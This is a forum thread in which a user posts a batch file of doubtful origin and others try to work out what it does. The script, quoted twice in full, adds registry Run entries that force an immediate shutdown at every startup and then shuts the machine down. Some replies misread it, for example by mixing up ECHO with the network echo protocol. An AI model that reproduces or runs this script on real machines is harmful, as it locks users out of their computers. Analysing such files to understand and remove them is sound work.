you think too deep leOriginally posted by R3SsH|n:doesn't look good...doesn't look good at all...
could be a trojan...or a backdoor...
u play 2 much dota niaOriginally posted by dark_snowboy:if im not wrong, the computer will play the "ownage" sound clip when it shut down or boot up![]()
as what i told you, thats what i think, or wait for mayi to come online baOriginally posted by wrexham:well, i got this from not a v. good source =X
just wanted to know what exactly does it do
can anyone analyse?
nope, i dont have much affiliation to dota.Originally posted by FBI:u play 2 much dota nia
isnt echo=sound that type of stuffOriginally posted by StarPuppy:eh..actually he might not be wrong leh...
it seems like
ECHO "ownage"="shutdown.exe -s -t 00" >>
the screen might show "ownange" then it will shutdown![]()
![]()
one thing for sure...once click..it will activate the shutdown...
i play this trick of shutdown before![]()
![]()
![]()
i am not very sure...all i knowOriginally posted by wrexham:well, i got this from not a v. good source =X
just wanted to know what exactly does it do
can anyone analyse?
Seems like ownage is a trigger to the shutdown command ?Originally posted by wrexham:@ECHO off
CLS
COPY %0 C:\%0_1.bat
ECHO REGEDIT4 >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
ECHO [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "backup1"="C:\%0_1.bat" >> temp.reg
REGEDIT.EXE /s temp.reg
SHUTDOWN.EXE -s -t 00
in a bat file?
don mess with registry..Originally posted by Sekundes:Seems like ownage is a trigger to the shutdown command ?
delete it from your registry la...
Batch file.
i not very sure..let the pros come in and handleOriginally posted by dark_snowboy:isnt echo=sound that type of stuff![]()
(IF IT IS TRUE)Originally posted by wrexham:cause when i got it, they said that it would repeatedly shut down the computer when you start it up =X is it true?
if it is, is there anyway to stop the process?
In order, ("useless" and repeated commands I've omitted)Originally posted by wrexham:@ECHO off
CLS
COPY %0 C:\%0_1.bat
ECHO REGEDIT4 >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
ECHO [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "backup1"="C:\%0_1.bat" >> temp.reg
REGEDIT.EXE /s temp.reg
SHUTDOWN.EXE -s -t 00 in a bat file?
What echo are you looking at?Originally posted by StarPuppy:just checked wiki
ECHO protocol
From Wikipedia, the free encyclopedia
The ECHO service is an internet protocol defined in RFC 862. It was originally proposed as a way to test and measure an IP network
A host may connect to a server that supports the ECHO protocol on either TCP or UDP port 7. The server then sends back any data it receives, with no modification by the echo server.
delete the file if u not using it?